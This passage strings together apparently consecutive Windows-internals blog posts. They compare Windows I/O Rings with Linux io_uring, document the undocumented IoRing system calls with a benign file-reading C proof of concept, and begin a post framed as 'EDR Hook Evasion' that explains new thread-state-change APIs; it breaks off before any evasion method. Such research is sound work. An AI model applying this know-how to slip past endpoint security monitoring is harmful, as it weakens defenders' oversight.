IoRing vs. io_uring: a comparison of Windows and Linux implementations

A few months ago I wrote this post about the introduction of I/O Rings in Windows. After publishing it a few people asked for a comparison of the Windows I/O Ring and the Linux io_uring, so I decided to do just that. The short answer – the Windows implementation is almost identical to the Linux one, especially when using the wrapper function provided by helper libraries. The long answer is what I’ll be covering in the rest of this post.
The information about the io_uring implementation was gathered mostly from here – a paper documenting the internal implementation and usage of io_uring on Linux and explaining some of the reasons for its existence and the way it was built.
As I said, the basic implementation of both mechanisms is very similar – both are built around a submission queue and a completion queue that have shared views in both user and kernel address spaces. The application writes the requested operation data into the submission queue and submits it to the kernel, which processes the requested number of entries and writes the results into the completion queue. In both cases there is a maximum number of allowed entries per ring, and the completion queue can have up to twice as many entries as the submission queue. However, there are some differences in the internal structures, as well as in the way the application is expected to interact with the I/O ring.

Initialization and Memory Mapping

One such difference is the initialization stage and mapping of the queues into user space: on Windows the kernel fully initializes the new ring, including the creation of both queues and creating a shared view in the application’s user-mode address space, using an MDL. However, in the Linux io_uring implementation, the system creates the requested ring and the queues but does not map them into user space. The application is expected to call mmap(2) using the appropriate file descriptors to map both queues into its address space, as well as the SQE array, which is separate from the main queue.
This is another difference worth noting – on Linux the completion ring (or queue) directly contains the array of CQEs, but the submission ring does not. Instead, the sqes field in the submission ring is a pointer to another memory region containing the array of SQEs, which has to be mapped separately. To index this array, the sqring has an additional array field holding indices into the SQE array. Not being a Linux expert, I won’t try to explain the reasoning behind this design and will simply quote the reasoning given in the paper mentioned above:

This might initially seem odd and confusing, but there’s some reasoning behind it. Some applications may embed request units inside internal data structures, and this allows them the flexibility to do so while retaining the ability to submit multiple sqes in one operation. That in turns allows for easier conversion of said applications to the io_uring interface.

On Windows there are only two important regions since the SQEs are part of the submission ring. In fact both rings are allocated by the system in the same memory region so there is only one shared view between the user and kernel space, containing two separate rings.
One more difference exists when creating a new I/O ring: on Linux the number of entries in a submission ring can be between 1 and 0x1000 (4096), while on Windows it can be between 1 and 0x10000, though at least 8 entries will always be allocated. In both cases the completion queue will have twice the number of entries of the submission queue. There is one small difference regarding the exact number of entries requested for the ring: for technical reasons, the number of entries in both rings has to be a power of two. On Windows, the system takes the requested ring size and rounds it up to the next power of two to get the actual size that will be used to allocate the ring memory. On Linux the system does not do that, and the application is expected to request a size that is a power of two.

Versioning

Windows puts far more focus on compatibility than Linux does, putting a lot of effort into making sure that when a new feature ships, applications using it keep working properly across different Windows builds even as the feature changes. For that reason, Windows implements versioning for its structures and features, while Linux does not. Windows also rolls out I/O rings in phases, marked by those versions: the first version only implements read operations, the next will add write and flush operations, and so on. When creating an I/O ring the caller needs to pass in a version to indicate which version of I/O rings it wants to use.
On Linux, however, the feature was implemented fully from the beginning and does not require versioning. Also, Linux doesn’t put as much focus on compatibility and users of io_uring are expected to use and support the latest features.

Waiting for Operation Completion

On both Windows and Linux the caller can choose not to wait for the completion of operations in the I/O ring and simply get notified when all operations are complete, making this feature fully asynchronous. In both systems the caller can also choose to wait for all events in a fully synchronous way, specifying a timeout in case processing the events takes too long. Everything in between is where the systems differ.
On Linux, a caller can request to wait for the completion of a specific number of operations in the ring, a capability Windows initially didn’t offer. This allows applications to start processing results after a certain number of operations have completed, instead of waiting for all of them. In newer builds Windows did add a similar yet slightly more limited option – registering a notification event that gets set when the first entry in the ring completes, signaling to the waiting application that it’s safe to start processing results.

Helper Libraries

In both systems it is possible for an application to manage its rings itself through system calls. This is an option that’s accepted on Linux and highly discouraged on Windows, where the NT API is undocumented and officially should not be used by non-Microsoft code. However, in both systems most applications have no need to manage the rings themselves, and a lot of generic ring-management code can be abstracted into a separate component. This is done through helper libraries – KernelBase.dll on Windows and liburing on Linux.
Both libraries export generic functionality like creating, initializing and deleting an I/O ring, creating submission queue entries, submitting a ring and getting a result from the completion queue.
Both libraries use very similar functions and data structures, making the task of porting code from one platform to the other much easier.

Conclusion

The implementation of I/O rings on Windows is so similar to the Linux io_uring that it looks like some headers were almost copied from the io_uring implementation. There are some differences between the two features, mostly due to philosophical differences between the two systems and the role and responsibilities they give the user. The Linux io_uring was added a couple of years ago, making it a more mature feature than the new Windows implementation, though still a relatively young one and not without issues. It will be interesting to see where these two features go in the future and how much parity will exist between them in a few years.

I/O Rings – When One I/O Operation is Not Enough

Introduction

I usually write about security features or techniques on Windows. But today’s blog is not directly related to any security topics, other than the usual added risk that any new system call introduces. However, it’s an interesting addition to the I/O world in Windows that could be useful for developers and I thought it would be interesting to look into and write about. All this is to say – if you’re looking for a new exploit or EDR bypass technique, you should save yourselves the time and look at the other posts on this website instead.

For the three of you who are still reading, let’s talk about I/O rings!

I/O rings are a new feature in Windows preview builds: the Windows implementation of a ring buffer – a circular buffer, in this case used to queue multiple I/O operations simultaneously, so that user-mode applications performing a lot of I/O can submit it all in one action instead of transitioning from user to kernel and back for every individual request.

This new feature adds a lot of new functions and internal data structures, so to avoid constantly breaking the flow of the blog with new data structures I will not put them as part of the post, but their definitions exist in the code sample at the end. I will only show a few internal data structures that aren’t used in the code sample.

I/O Ring Usage

The current implementation of I/O rings only supports read operations and allows queuing up to 0x10000 operations at a time. For every operation the caller will need to supply a handle to the target file, an output buffer, an offset into the file and amount of memory to be read. This is all done in multiple new data structures that will be discussed later. But first, the caller needs to initialize its I/O ring.

Create and Initialize an I/O Ring

To do that, the system supplies a new system call – NtCreateIoRing. This function creates an instance of a new IoRing object type, described here as IORING_OBJECT:

typedef struct _IORING_OBJECT
{
  USHORT Type;
  USHORT Size;
  NT_IORING_INFO Info;
  PSECTION SectionObject;
  PVOID KernelMappedBase;
  PMDL Mdl;
  PVOID MdlMappedBase;
  ULONG_PTR ViewSize;
  ULONG SubmitInProgress;
  PVOID IoRingEntryLock;
  PVOID EntriesCompleted;
  PVOID EntriesSubmitted;
  KEVENT RingEvent;
  PVOID EntriesPending;
  ULONG BuffersRegistered;
  PIORING_BUFFER_INFO BufferArray;
  ULONG FilesRegistered;
  PHANDLE FileHandleArray;
} IORING_OBJECT, *PIORING_OBJECT;

NtCreateIoRing receives one new structure as an input argument – IO_RING_STRUCTV1. This structure contains the version (currently this can only be 1), required and advisory flags (neither currently supports any value other than 0), and the requested sizes for the submission queue and completion queue.

The function receives this information and does the following things:

  1. Validates all the input and output arguments – their addresses, size alignment, etc.
  2. Checks the requested submission queue size and calculates the amount of memory needed for the submission queue based on the requested number of entries.
    1. If SubmissionQueueSize is over 0x10000 a new error status STATUS_IORING_SUBMISSION_QUEUE_TOO_BIG gets returned.
  3. Checks the completion queue size and calculates the amount of memory needed for it.
    1. The completion queue is limited to 0x20000 entries and error code STATUS_IORING_COMPLETION_QUEUE_TOO_BIG is returned if a larger number is requested.
  4. Creates a new object of type IoRingObjectType and initializes all fields that can be initialized at this point – flags, submission queue size and mask, event, etc.
  5. Creates a section for the queues, maps it into system space, and creates an MDL to back it. It then maps the same section into user space. This section will contain the submission and completion queues and will be used by the application to communicate the parameters of all requested I/O operations to the kernel and receive the status codes.
  6. Initializes the output structure with the submission queue address and other data to be returned to the caller.

After NtCreateIoRing returns successfully, the caller can write its data into the supplied submission queue. The queue will have a queue head, followed by an array of NT_IORING_SQE structures, each representing one requested I/O operation. The header describes which entries should be processed at this time:

The queue header describes which entries should be processed using the QueueIndex and QueueCount fields. QueueIndex specifies the index of the first entry to be processed, and QueueCount specifies the number of entries. QueueCount - QueueIndex has to be lower than the total number of entries.

Each queue entry contains data about the requested operation: file handle, file offset, output buffer base, offset and amount of data to be read.  It also contains an OpCode field to specify the requested operation.

I/O Ring Operation Codes

There are four possible operation types that can be requested by the caller:

  1. IORING_OP_READ: requests that the system reads data from a file into an output buffer. The file handle will be read from the FileRef field in the submission queue entry. This will either be interpreted as a file handle or as an index into a pre-registered array of file handles, depending on whether the IORING_SQE_PREREGISTERED_FILE flag (1) is set in the queue entry Flags field. The output will be written into an output buffer supplied in the Buffer field of the entry. Similar to FileRef, this field can instead contain an index into a pre-registered array of output buffers if the IORING_SQE_PREREGISTERED_BUFFER flag (2) is set.
  2. IORING_OP_REGISTERED_FILES: requests pre-registration of file handles to be processed later. In this case the Buffer field of the queue entry points to an array of file handles. The requested file handles get duplicated and placed in a new array, pointed to by the FileHandleArray field of the I/O ring object. The FilesRegistered field will contain the number of file handles.
  3. IORING_OP_REGISTERED_BUFFERS: requests pre-registration of output buffers for file data to be read into. In this case, the Buffer field in the entry should contain an array of IORING_BUFFER_INFO structures, describing addresses and sizes of buffers into which file data will be read:

    typedef struct _IORING_BUFFER_INFO
    {
        PVOID Address;
        ULONG Length;
    } IORING_BUFFER_INFO, *PIORING_BUFFER_INFO;

    The buffers’ addresses and sizes will be copied into a new array, pointed to by the BufferArray field of the I/O ring object. The BuffersRegistered field will contain the number of buffers.

  4. IORING_OP_CANCEL: requests the cancellation of a pending operation for a file. Just like in IORING_OP_READ, FileRef can be a handle or an index into the file handle array, depending on the flags. In this case the Buffer field points to the IO_STATUS_BLOCK of the operation to be canceled.

All these options can be a bit confusing so here are illustrations for the 4 different reading scenarios, based on the requested flags:

Flags are 0, using the FileRef field as a file handle and the Buffer field as a pointer to the output buffer:

Flag IORING_SQE_PREREGISTERED_FILE (1) is requested, so FileRef is treated as an index into an array of pre-registered file handles and Buffer is a pointer to the output buffer:

Flag IORING_SQE_PREREGISTERED_BUFFER (2) is requested, so FileRef is a handle to a file and Buffer is treated as an index into an array of pre-registered output buffers:

Both IORING_SQE_PREREGISTERED_FILE and IORING_SQE_PREREGISTERED_BUFFER flags are set, so FileRef is treated as an index into a pre-registered file handle array and Buffer is treated as index into a pre-registered buffers array:

Submitting and Processing I/O Ring

Once the caller has set up all its submission queue entries, it can call NtSubmitIoRing to submit its requests to the kernel for processing according to the requested parameters. Internally, NtSubmitIoRing iterates over all the entries and calls IopProcessIoRingEntry, passing the IoRing object and the current queue entry. The entry gets processed according to the specified OpCode, and IopIoRingDispatchComplete is then called to fill in the completion queue. The completion queue, much like the submission queue, begins with a header containing a queue index and count, followed by an array of entries. Each entry is an IORING_CQE structure – it holds the UserData value from the submission queue entry and the Status and Information from the IO_STATUS_BLOCK for the operation:

typedef struct _IORING_CQE
{
    UINT_PTR UserData;
    HRESULT ResultCode;
    ULONG_PTR Information;
} IORING_CQE, *PIORING_CQE;

Once all requested entries are completed, the system sets the event in IoRingObject->RingEvent. Until all entries are complete, the system waits on the event using the Timeout received from the caller, waking up either when all requests complete and the event is signaled, or when the timeout expires.

Since multiple entries can be processed, the status returned to the caller will either be an error status indicating a failure to process the entries or the return value of KeWaitForSingleObject. Status codes for individual operations can be found in the completion queue – so don’t confuse receiving a STATUS_SUCCESS code from NtSubmitIoRing with successful read operations!

Using I/O Ring – The Official Way

Like other system calls, those new IoRing functions are not documented and not meant to be used directly. Instead, KernelBase.dll offers convenient wrapper functions that receive easy-to-use arguments and internally handle all the undocumented functions and data structures that need to be sent to the kernel. There are functions to create, query, submit and close the IoRing, as well as helper functions to build queue entries for the four different operations, which were discussed earlier.

CreateIoRing

CreateIoRing receives information about flags and queue sizes, and internally calls NtCreateIoRing and returns a handle to an IoRing instance:

HRESULT
CreateIoRing (
    _In_ IORING_VERSION IoRingVersion,
    _In_ IORING_CREATE_FLAGS Flags,
    _In_ UINT32 SubmissionQueueSize,
    _In_ UINT32 CompletionQueueSize,
    _Out_ HIORING* Handle
);

This new handle type is actually a pointer to an undocumented structure containing the structure returned from NtCreateIoRing and other data needed to manage this IoRing instance:

typedef struct _HIORING
{
    ULONG SqePending;
    ULONG SqeCount;
    HANDLE handle;
    IORING_INFO Info;
    ULONG IoRingKernelAcceptedVersion;
} HIORING, *PHIORING;

All the other IoRing functions will receive this handle as their first argument.

After creating an IoRing instance, the application needs to build queue entries for all the requested I/O operations. Since the internal structure of the queues and the queue entry structures are not documented, KernelBase.dll exports helper functions to build those using input data supplied by the caller. There are four functions for this purpose:

  1. BuildIoRingReadFile
  2. BuildIoRingRegisterBuffers
  3. BuildIoRingRegisterFileHandles
  4. BuildIoRingCancelRequest

Each function adds a new queue entry to the submission queue with the required opcode and data. Their names make their purposes pretty obvious, but let's go over them one by one for clarity:

BuildIoRingReadFile

HRESULT
BuildIoRingReadFile (
    _In_ HIORING IoRing,
    _In_ IORING_HANDLE_REF FileRef,
    _In_ IORING_BUFFER_REF DataRef,
    _In_ ULONG NumberOfBytesToRead,
    _In_ ULONG64 FileOffset,
    _In_ ULONG_PTR UserData,
    _In_ IORING_SQE_FLAGS Flags
);

The function receives the handle returned by CreateIoRing, followed by two new data structures. Both of these structures have a Kind field, which can be either IORING_REF_RAW, indicating that the supplied value is a raw reference, or IORING_REF_REGISTERED, indicating that the value is an index into a pre-registered array. The second field is a union of a value and an index, in which the file handle or buffer is supplied.

BuildIoRingRegisterFileHandles and BuildIoRingRegisterBuffers

HRESULT
BuildIoRingRegisterFileHandles (
    _In_ HIORING IoRing,
    _In_ ULONG Count,
    _In_ HANDLE const Handles[],
    _In_ PVOID UserData
);

HRESULT
BuildIoRingRegisterBuffers (
    _In_ HIORING IoRing,
    _In_ ULONG Count,
    _In_ IORING_BUFFER_INFO const Buffers[],
    _In_ PVOID UserData
);

These two functions create submission queue entries to pre-register file handles and output buffers. Both receive the handle returned from CreateIoRing, the count of pre-registered files/buffers in the array, an array of the handles or buffers to register and UserData.

In BuildIoRingRegisterFileHandles, Handles is a pointer to an array of file handles and in BuildIoRingRegisterBuffers, Buffers is a pointer to an array of IORING_BUFFER_INFO structures containing Buffer base and size.

BuildIoRingCancelRequest

HRESULT
BuildIoRingCancelRequest (
    _In_ HIORING IoRing,
    _In_ IORING_HANDLE_REF File,
    _In_ PVOID OpToCancel,
    _In_ PVOID UserData
);

Just like the other functions, BuildIoRingCancelRequest receives as its first argument the handle that was returned from CreateIoRing. The second argument is an IORING_HANDLE_REF containing the handle (or index into the file handles array) of the file whose operation should be canceled. The third argument identifies the operation to cancel, and the fourth is the UserData to be placed in the queue entry.

After all queue entries were built with those functions, the queue can be submitted:

SubmitIoRing

HRESULT
SubmitIoRing (
    _In_ HIORING IoRingHandle,
    _In_ ULONG WaitOperations,
    _In_ ULONG Milliseconds,
    _Out_ PULONG SubmittedEntries
);

The function receives as its first argument the same handle that was used to initialize the IoRing and submission queue. Then it receives the number of operations to wait on, the time in milliseconds to wait for their completion, and a pointer to an output parameter that will receive the number of entries that were submitted.

GetIoRingInfo

HRESULT
GetIoRingInfo (
    _In_ HIORING IoRingHandle,
    _Out_ PIORING_INFO IoRingBasicInfo
);

This API returns information about the current state of the IoRing with a new structure:

typedef struct _IORING_INFO
{
  IORING_VERSION IoRingVersion;
  IORING_CREATE_FLAGS Flags;
  ULONG SubmissionQueueSize;
  ULONG CompletionQueueSize;
} IORING_INFO, *PIORING_INFO;

This contains the version and flags of the IoRing as well as the current size of the submission and completion queues.

Once all operations on the IoRing are done, it needs to be closed using CloseIoRing, which receives the handle as its only argument, closes the handle to the IoRing object, and frees the memory used for the structure.

So far I couldn’t find anything on the system that makes use of this feature, but once 21H2 is released I’d expect to see I/O-heavy Windows applications start using it, probably mostly in server and Azure environments.

Conclusion

So far, no public documentation exists for this new addition to the I/O world in Windows, but hopefully when 21H2 is released later this year we will see all of this officially documented and used by both Windows and 3rd party applications. If used wisely, this could lead to significant performance improvements for applications that have frequent read operations. Like every new feature and system call this could also have unexpected security effects. One bug was already found by hFiref0x, who was the first to publicly mention this feature and managed to crash the system by sending an incorrect parameter to NtCreateIoRing – a bug that was fixed since then. Looking more closely into these functions will likely lead to more such discoveries and interesting side effects of this new mechanism.

Code

Here’s a small PoC showing two ways to use I/O rings – either through the official KernelBase API, or through the internal ntdll API. For the code to compile properly make sure to link it against onecoreuap.lib (for the KernelBase functions) or ntdll.lib (for the ntdll functions):

#include <ntstatus.h>
#define WIN32_NO_STATUS
#include <Windows.h>
#include <cstdio>
#include <ioringapi.h>
#include <winternl.h>

typedef struct _IO_RING_STRUCTV1
{
    ULONG IoRingVersion;
    ULONG SubmissionQueueSize;
    ULONG CompletionQueueSize;
    ULONG RequiredFlags;
    ULONG AdvisoryFlags;
} IO_RING_STRUCTV1, *PIO_RING_STRUCTV1;

typedef struct _IORING_QUEUE_HEAD
{
    ULONG QueueIndex;
    ULONG QueueCount;
    ULONG64 Aligment;
} IORING_QUEUE_HEAD, *PIORING_QUEUE_HEAD;

typedef struct _NT_IORING_INFO
{
    ULONG Version;
    IORING_CREATE_FLAGS Flags;
    ULONG SubmissionQueueSize;
    ULONG SubQueueSizeMask;
    ULONG CompletionQueueSize;
    ULONG CompQueueSizeMask;
    PIORING_QUEUE_HEAD SubQueueBase;
    PVOID CompQueueBase;
} NT_IORING_INFO, *PNT_IORING_INFO;

typedef struct _NT_IORING_SQE
{
    ULONG Opcode;
    ULONG Flags;
    HANDLE FileRef;
    LARGE_INTEGER FileOffset;
    PVOID Buffer;
    ULONG BufferSize;
    ULONG BufferOffset;
    ULONG Key;
    PVOID Unknown;
    PVOID UserData;
    PVOID stuff1;
    PVOID stuff2;
    PVOID stuff3;
    PVOID stuff4;
} NT_IORING_SQE, *PNT_IORING_SQE;

EXTERN_C_START
NTSTATUS
NtSubmitIoRing (
    _In_ HANDLE Handle,
    _In_ IORING_CREATE_REQUIRED_FLAGS Flags,
    _In_ ULONG EntryCount,
    _In_ PLARGE_INTEGER Timeout
    );

NTSTATUS
NtCreateIoRing (
    _Out_ PHANDLE pIoRingHandle,
    _In_ ULONG CreateParametersSize,
    _In_ PIO_RING_STRUCTV1 CreateParameters,
    _In_ ULONG OutputParametersSize,
    _Out_ PNT_IORING_INFO pRingInfo
    );

NTSTATUS
NtClose (
    _In_ HANDLE Handle
    );

EXTERN_C_END

void IoRingNt ()
{
    NTSTATUS status;
    IO_RING_STRUCTV1 ioringStruct;
    NT_IORING_INFO ioringInfo;
    HANDLE handle;
    PNT_IORING_SQE sqe;
    LARGE_INTEGER timeout;
    HANDLE hFile = NULL;
    ULONG sizeToRead = 0x200;
    PVOID *buffer = NULL;
    ULONG64 endOfBuffer;

    ioringStruct.IoRingVersion = 1;
    ioringStruct.SubmissionQueueSize = 1;
    ioringStruct.CompletionQueueSize = 1;
    ioringStruct.AdvisoryFlags = IORING_CREATE_ADVISORY_FLAGS_NONE;
    ioringStruct.RequiredFlags = IORING_CREATE_REQUIRED_FLAGS_NONE;

    status = NtCreateIoRing(&handle,
                            sizeof(ioringStruct),
                            &ioringStruct,
                            sizeof(ioringInfo),
                            &ioringInfo);
    if (!NT_SUCCESS(status))
    {
        printf("Failed creating IO ring handle: 0x%x\n", status);
        goto Exit;
    }

    ioringInfo.SubQueueBase->QueueCount = 1;
    ioringInfo.SubQueueBase->QueueIndex = 0;
    ioringInfo.SubQueueBase->Aligment = 0;

    hFile = CreateFile(L"C:\\Windows\\System32\\notepad.exe",
                       GENERIC_READ,
                       0,
                       NULL,
                       OPEN_EXISTING,
                       FILE_ATTRIBUTE_NORMAL,
                       NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        printf("Failed opening file handle: 0x%x\n", GetLastError());
        goto Exit;
    }

    sqe = (PNT_IORING_SQE)((ULONG64)ioringInfo.SubQueueBase + sizeof(IORING_QUEUE_HEAD));
    sqe->Opcode = 1;
    sqe->Flags = 0;
    sqe->FileRef = hFile;
    sqe->FileOffset.QuadPart = 0;
    buffer = (PVOID*)VirtualAlloc(NULL, sizeToRead, MEM_COMMIT, PAGE_READWRITE);
    if (buffer == NULL)
    {
        printf("Failed allocating memory\n");
        goto Exit;
    }
    sqe->Buffer = buffer;
    sqe->BufferOffset = 0;
    sqe->BufferSize = sizeToRead;
    sqe->Key = 1234;
    sqe->UserData = nullptr;

    timeout.QuadPart = -10000;

    status = NtSubmitIoRing(handle, IORING_CREATE_REQUIRED_FLAGS_NONE, 1, &timeout);
    if (!NT_SUCCESS(status))
    {
        printf("Failed submitting IO ring: 0x%x\n", status);
        goto Exit;
    }
    printf("Data from file:\n");
    endOfBuffer = (ULONG64)buffer + sizeToRead;
    for (; (ULONG64)buffer < endOfBuffer; buffer++)
    {
        printf("%p ", *buffer);
    }
    printf("\n");

Exit:
    if (handle)
    {
        NtClose(handle);
    }
    if (hFile)
    {
        NtClose(hFile);
    }
    if (buffer)
    {
        VirtualFree(buffer, NULL, MEM_RELEASE);
    }
}

void IoRingKernelBase ()
{
    HRESULT result;
    HIORING handle;
    IORING_CREATE_FLAGS flags;
    IORING_HANDLE_REF requestDataFile;
    IORING_BUFFER_REF requestDataBuffer;
    UINT32 submittedEntries;
    HANDLE hFile = NULL;
    ULONG sizeToRead = 0x200;
    PVOID *buffer = NULL;
    ULONG64 endOfBuffer;

    flags.Required = IORING_CREATE_REQUIRED_FLAGS_NONE;
    flags.Advisory = IORING_CREATE_ADVISORY_FLAGS_NONE;
    result = CreateIoRing(IORING_VERSION_1, flags, 1, 1, &handle);
    if (!SUCCEEDED(result))
    {
        printf("Failed creating IO ring handle: 0x%x\n", result);
        goto Exit;
    }

    hFile = CreateFile(L"C:\\Windows\\System32\\notepad.exe",
                       GENERIC_READ,
                       0,
                       NULL,
                       OPEN_EXISTING,
                       FILE_ATTRIBUTE_NORMAL,
                       NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        printf("Failed opening file handle: 0x%x\n", GetLastError());
        goto Exit;
    }
    requestDataFile.Kind = IORING_REF_RAW;
    requestDataFile.Handle = hFile;
    requestDataBuffer.Kind = IORING_REF_RAW;
    buffer = (PVOID*)VirtualAlloc(NULL,
                                  sizeToRead,
                                  MEM_COMMIT,
                                  PAGE_READWRITE);
    if (buffer == NULL)
    {
        printf("Failed to allocate memory\n");
        goto Exit;
    }
    requestDataBuffer.Buffer = buffer;
    result = BuildIoRingReadFile(handle,
                                 requestDataFile,
                                 requestDataBuffer,
                                 sizeToRead,
                                 0,
                                 NULL,
                                 IOSQE_FLAGS_NONE);
    if (!SUCCEEDED(result))
    {
        printf("Failed building IO ring read file structure: 0x%x\n", result);
        goto Exit;
    }

    result = SubmitIoRing(handle, 1, 10000, &submittedEntries);
    if (!SUCCEEDED(result))
    {
        printf("Failed submitting IO ring: 0x%x\n", result);
        goto Exit;
    }
    printf("Data from file:\n");
    endOfBuffer = (ULONG64)buffer + sizeToRead;
    for (; (ULONG64)buffer < endOfBuffer; buffer++)
    {
        printf("%p ", *buffer);
    }
    printf("\n");

Exit:
    if (handle != 0)
    {
        CloseIoRing(handle);
    }
    if (hFile)
    {
        NtClose(hFile);
    }
    if (buffer)
    {
        VirtualFree(buffer, NULL, MEM_RELEASE);
    }
}

int main ()
{
    IoRingKernelBase();
    IoRingNt();
    ExitProcess(0);
}

Thread and Process State Change

a.k.a: EDR Hook Evasion – Method #4512

Every couple of weeks a new build of Windows Insider gets released. Some have lots of changes and introduce completely new features, some only have minor bug fixes, and some simply insist on crashing repeatedly for no good reason. A few months ago one of those builds had a few surprising changes — it introduced two new object types and four new system calls, which is not something that happens every day. So of course I went investigating. What I discovered is a confusingly over-engineered feature, which was added to solve a problem that could have been solved by much simpler means and which has the side effect of supplying attackers with a new way to evade EDR hooks.

Suspending and Resuming Threads – Now With 2 Extra Steps!

The problem that this feature is trying to solve is this: what happens if a process suspends a thread and then terminates before resuming it? Unless some other part of the system realizes what happened, the thread will remain suspended forever and will never resume its execution. To solve that, this new feature allows suspending and resuming threads and processes through the new object types, which will keep track of the suspension state of the threads or processes. That way, when the object is destroyed (for example, when the process that created it is terminated), the system will reset the state of the target process or thread by suspending or resuming it as needed.

This feature is pretty easy to use – the caller first needs to call NtCreateThreadStateChange (or NtCreateProcessStateChange – both cases are almost identical, but we’ll stick with the thread case for simplicity) to create a new object of type PspThreadStateChangeType. This object type is not documented, but its internal structure looks something like this:

typedef struct _THREAD_STATE_OBJECT
{
    PETHREAD Thread;
    EX_PUSH_LOCK Lock;
    ULONG ThreadSuspendCount;
} THREAD_STATE_OBJECT, *PTHREAD_STATE_OBJECT;

NtCreateThreadStateChange has the following prototype:

NTSTATUS
NtCreateThreadStateChange (
    _Out_ PHANDLE StateChangeHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ HANDLE ThreadHandle,
    _In_ ULONG Unused
);

The 2 arguments we are interested in are the first, which will receive a handle to the new object, and the fourth – a handle to the thread that will be referenced by the structure. Any future suspend or resume operation done through this object can only act on the thread passed into this function. NtCreateThreadStateChange will create a new object instance, set the thread pointer to the requested thread, and initialize the lock and count fields to zero.

When calling NtCreateProcessStateChange to operate on a process, the thread handle will be replaced with a process handle and the object that will be created will be of type PspProcessStateChangeType. The only change in the structure is that the ETHREAD pointer is replaced with an EPROCESS pointer.

The next step is calling NtChangeThreadState (or NtChangeProcessState, if operating on a process). This function receives a handle to the thread state change object, a handle to the same thread that was passed when creating the object, and an action, which is an enum value:

typedef enum _THREAD_STATE_CHANGE_TYPE
{
    ThreadStateChangeSuspend = 0,
    ThreadStateChangeResume = 1,
    ThreadStateChangeMax = 2,
} THREAD_STATE_CHANGE_TYPE, *PTHREAD_STATE_CHANGE_TYPE;

typedef enum _PROCESS_STATE_CHANGE_TYPE
{
    ProcessStateChangeSuspend = 0,
    ProcessStateChangeResume = 1,
    ProcessStateChangeMax = 2,
} PROCESS_STATE_CHANGE_TYPE, *PPROCESS_STATE_CHANGE_TYPE;

It also receives an “Extended Information” variable and its length, both of which are unused and must be zero, and another reserved argument that must also be zero. The function will validate that the thread pointed to by the thread state change object is the same as the thread whose handle was passed into the function, and then call the appropriate function based on the requested action – PsSuspendThread or PsMultiResumeThread. Then it will increment or decrement the ThreadSuspendCount field based on the action that was performed. There are 2 limitations enforced by the suspend count:

  1. A thread cannot be resumed if the object’s ThreadSuspendCount is zero, even if the thread is currently suspended. It must be suspended and resumed using the state change API, otherwise things will start acting funny.
  2. A thread cannot be suspended if ThreadSuspendCount is 0x7FFFFFFF. This is meant to avoid overflowing the counter. However, this is a weird limitation, since KeSuspendThread (the internal function called by PsSuspendThread) already enforces a suspension limit of 127 through the thread’s SuspendCount field, and will return STATUS_SUSPEND_COUNT_EXCEEDED if the count exceeds that.

So far this works like the classic suspend and resume mechanism, just with a few extra steps. A caller still needs to make an API call to suspend a thread or process and another one to resume it. But the benefit of having new object types is that objects can have kernel routines that get called for certain operations related to the object, such as open, close and delete:

dx (*(nt!_OBJECT_TYPE**)&nt!PspThreadStateChangeType)->TypeInfo
    (*(nt!_OBJECT_TYPE**)&nt!PspThreadStateChangeType)->TypeInfo                 [Type: _OBJECT_TYPE_INITIALIZER]
    [+0x000] Length           : 0x78 [Type: unsigned short]
    [+0x002] ObjectTypeFlags  : 0x6 [Type: unsigned short]
    [+0x002 ( 0: 0)] CaseInsensitive  : 0x0 [Type: unsigned char]
    [+0x002 ( 1: 1)] UnnamedObjectsOnly : 0x1 [Type: unsigned char]
    [+0x002 ( 2: 2)] UseDefaultObject : 0x1 [Type: unsigned char]
    [+0x002 ( 3: 3)] SecurityRequired : 0x0 [Type: unsigned char]
    [+0x002 ( 4: 4)] MaintainHandleCount : 0x0 [Type: unsigned char]
    [+0x002 ( 5: 5)] MaintainTypeList : 0x0 [Type: unsigned char]
    [+0x002 ( 6: 6)] SupportsObjectCallbacks : 0x0 [Type: unsigned char]
    [+0x002 ( 7: 7)] CacheAligned     : 0x0 [Type: unsigned char]
    [+0x003 ( 0: 0)] UseExtendedParameters : 0x0 [Type: unsigned char]
    [+0x003 ( 7: 1)] Reserved         : 0x0 [Type: unsigned char]
    [+0x004] ObjectTypeCode   : 0x0 [Type: unsigned long]
    [+0x008] InvalidAttributes : 0x92 [Type: unsigned long]
    [+0x00c] GenericMapping   [Type: _GENERIC_MAPPING]
    [+0x01c] ValidAccessMask  : 0x1f0001 [Type: unsigned long]
    [+0x020] RetainAccess     : 0x0 [Type: unsigned long]
    [+0x024] PoolType         : PagedPool (1) [Type: _POOL_TYPE]
    [+0x028] DefaultPagedPoolCharge : 0x70 [Type: unsigned long]
    [+0x02c] DefaultNonPagedPoolCharge : 0x0 [Type: unsigned long]
    [+0x030] DumpProcedure    : 0x0 [Type: void (__cdecl*)(void *,_OBJECT_DUMP_CONTROL *)]
    [+0x038] OpenProcedure    : 0x0 [Type: long (__cdecl*)(_OB_OPEN_REASON,char,_EPROCESS *,void *,unsigned long *,unsigned long)]
    [+0x040] CloseProcedure   : 0x0 [Type: void (__cdecl*)(_EPROCESS *,void *,unsigned __int64,unsigned __int64)]
    [+0x048] DeleteProcedure  : 0xfffff80265650d20 [Type: void (__cdecl*)(void *)]
    [+0x050] ParseProcedure   : 0x0 [Type: long (__cdecl*)(void *,void *,_ACCESS_STATE *,char,unsigned long,_UNICODE_STRING *,_UNICODE_STRING *,void *,_SECURITY_QUALITY_OF_SERVICE *,void * *)]
    [+0x050] ParseProcedureEx : 0x0 [Type: long (__cdecl*)(void *,void *,_ACCESS_STATE *,char,unsigned long,_UNICODE_STRING *,_UNICODE_STRING *,void *,_SECURITY_QUALITY_OF_SERVICE *,_OB_EXTENDED_PARSE_PARAMETERS *,void * *)]
    [+0x058] SecurityProcedure : 0xfffff802656bffd0 [Type: long (__cdecl*)(void *,_SECURITY_OPERATION_CODE,unsigned long *,void *,unsigned long *,void * *,_POOL_TYPE,_GENERIC_MAPPING *,char)]
    [+0x060] QueryNameProcedure : 0x0 [Type: long (__cdecl*)(void *,unsigned char,_OBJECT_NAME_INFORMATION *,unsigned long,unsigned long *,char)]
    [+0x068] OkayToCloseProcedure : 0x0 [Type: unsigned char (__cdecl*)(_EPROCESS *,void *,void *,char)]
    [+0x070] WaitObjectFlagMask : 0x0 [Type: unsigned long]
    [+0x074] WaitObjectFlagOffset : 0x0 [Type: unsigned short]
    [+0x076] WaitObjectPointerOffset : 0x0 [Type: unsigned short]

